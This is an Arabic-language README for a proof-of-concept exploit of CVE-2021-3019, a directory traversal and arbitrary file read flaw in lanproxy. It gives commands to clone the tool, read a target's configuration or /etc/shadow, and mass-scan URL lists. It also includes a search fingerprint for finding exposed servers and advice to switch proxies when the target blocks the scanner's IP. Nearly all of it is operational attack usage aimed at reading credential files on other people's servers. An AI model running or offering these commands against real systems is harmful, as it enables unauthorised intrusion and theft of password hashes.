
CVE-2021-3019 lanproxy اكتشاف ثغرة اجتياز الدليل وقراءة الملفات التعسفية POC
CVE-2021-3019 ثغرة traversal directory في lanproxy تسمح بقراءة أي ملف

git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
عند تشغيلها بدون وسائط، تظهر معلومات المساعدة

فحص رابط واحد للثغرة، وإذا وُجدت الثغرة يتم قراءة ملف التهيئة وإخراجها افتراضيًا
python3 POC.py -u http://127.0.0.1:9100

استخدم الوسيط -r لقراءة ملفات أخرى من النظام، ويجب معرفة المسار المطلق للملف
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow

استخدم الوسيط -f للفحص الجماعي، وسيتم كتابة العناوين المصابة في ملف success.txt
python3 POC.py -f urls.txt

"Server: LPS-0.1" && title=="تسجيل الدخول"
عند ظهور الخطأ Connection reset by peer، فمن المرجح أن عنوان IP الخاص بك تم حظره من قبل الخادم الهدف. قم بتغيير عنوان IP الخاص بك باستخدام وكيل آخر.